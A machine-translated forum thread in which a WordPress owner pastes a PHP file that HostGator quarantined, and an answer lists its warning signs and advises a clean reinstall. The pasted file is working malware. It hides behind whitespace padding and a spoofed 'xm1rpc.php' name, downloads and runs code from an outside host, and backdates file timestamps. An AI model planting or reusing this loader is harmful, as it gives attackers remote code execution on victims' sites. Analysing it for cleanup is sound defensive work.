L'hosting degli errori di invio virus non ha potuto sbarazzarsi di questo

2

Ho un sito web wordpress e hostgator continua a inviare queste informazioni →

During a scan of our servers we identified malicious content in accounts under your control. We have quarantined the files listed below to prevent abuse. Please note that no services have been disabled and no legitimate content has been affected by this action. However, it is possible that other malicious activity may have disrupted your services.

The most important things you can do to ensure the security of your account are to make sure your software (e.g WordPress) is up-to-date, and that your passwords are strong. We strongly encourage you to change all of your account passwords and update all software as soon as possible to prevent any further compromises or abuse.

We understand that any risk to our network reputation is a risk to our customers' reputation and so we take third-party reports of network abuse seriously. In order to protect our shared reputation we may disable account services in the event of a third-party report of network abuse until we are confident that the account has been properly cleaned and secured.

This email is to inform you of content found by our proactive scans, and is not the result of a third-party abuse report. No services have been disabled as a result of this discovery. Additional information on HostGator's policies, and what activity is damaging to a network's reputation in general, is available in our knowledge base: Acceptable Use Policy

My Account was Hacked

If you would like help in securing your account we recommend SiteLock, a security service and partner of ours. They can be contacted at 844-631-8637. HostGator Security Department Quarantined files: /home2/xxxxx/public_html/xm1rpc.php


Ho allegato il file:

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $query = isset($_SERVER['QUERY_STRING'])? $_SERVER['QUERY_STRING']: ''; 
if (false !== strpos($query, 'simpler-ws')) { 
  __1get_ws(); 
  $ws_hash = md5('wsa'); 
  $cache_dir = __1get_root(); 
  $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; 
  require($ws_file); die(''); 
} 

function __1get_root() { 
  $localpath=getenv("SCRIPT_NAME");
  $absolutepath=getenv("SCRIPT_FILENAME");
  $root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
  return $root_path; 
} 

function __1get_ws() { 
  $host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: ''; 
  $ws_hash = md5('wsa'); 
  $cache_dir = __1get_root(); 
  $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; 
  if (file_exists($ws_file)) { 
    chmod($ws_file, 0644); 
  } 
  if (!file_exists($ws_file) || file_exists($ws_file) && (time() - filemtime($ws_file) > 60*60*1)) { 
  $ws = __1fetch_url(__get_rev().'&get_ws'); 
  if (!empty($ws)) 
    file_put_contents($ws_file, $ws); 
    chmod($ws_file, 0644); 
    touch($ws_file, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
    touch(dirname($ws_file) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
  } else { 
    $ws = file_get_contents($ws_file); 
  } 
  return $ws; 
} 

function __get_rev() { 
  return 'http://bokoinchina.com/extadult2.php?host='.trim(strtolower($_SERVER['HTTP_HOST']), '.').'&full_url='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); 
  return 'http://nezlobudnya.com/generate'; 
} 

function __1fetch_url($url) { 
  $contents = false; 
  $errs = 0; 
  while ( !$contents && ($errs++ < 3) ) { 
    $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'; 
      if (is_callable('curl_init')) { 
        $c = curl_init($url); 
        curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE); 
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($c, CURLOPT_USERAGENT,$user_agent); 
        $contents = curl_exec($c); 
          if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) 
              $contents = false; 
              curl_close($c); 
          } else { 
              $allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen')); 
                 if ($allowUrlFopen) { 
                    $options = array('http' => array('user_agent' => $user_agent)); $context = stream_context_create($options); $contents = @file_get_contents($url, false, $context); 
                 } 
          } 
      } 
   return $contents; 
}
// Silence is golden

Ho eseguito una scansione succurs, ma non è stato trovato alcun virus. qual è il problema?

    
posta The WP Novice 08.02.2017 - 04:17
fonte

1 risposta

1

Punti di sospetto con quel file:

  • un sacco di spazio sprecato prima del codice.

  • avviarlo come un file wordpress legittimo ma inserire codice in genere non trovato in quel file.

  • modificando leggermente il nome del file sostituendo l con 1

  • modifica dei diritti su altri file a livello di codice.

  • reindirizzare la pagina a un paio di altri siti.

  • non disinfettando le stringhe di input.

Probabilmente dovresti controllare il tuo server e il codice abbastanza accuratamente e poi pulire il server e reinstallare il tuo sito WordPress.

    
risposta data 08.02.2017 - 05:01
fonte

Leggi altre domande sui tag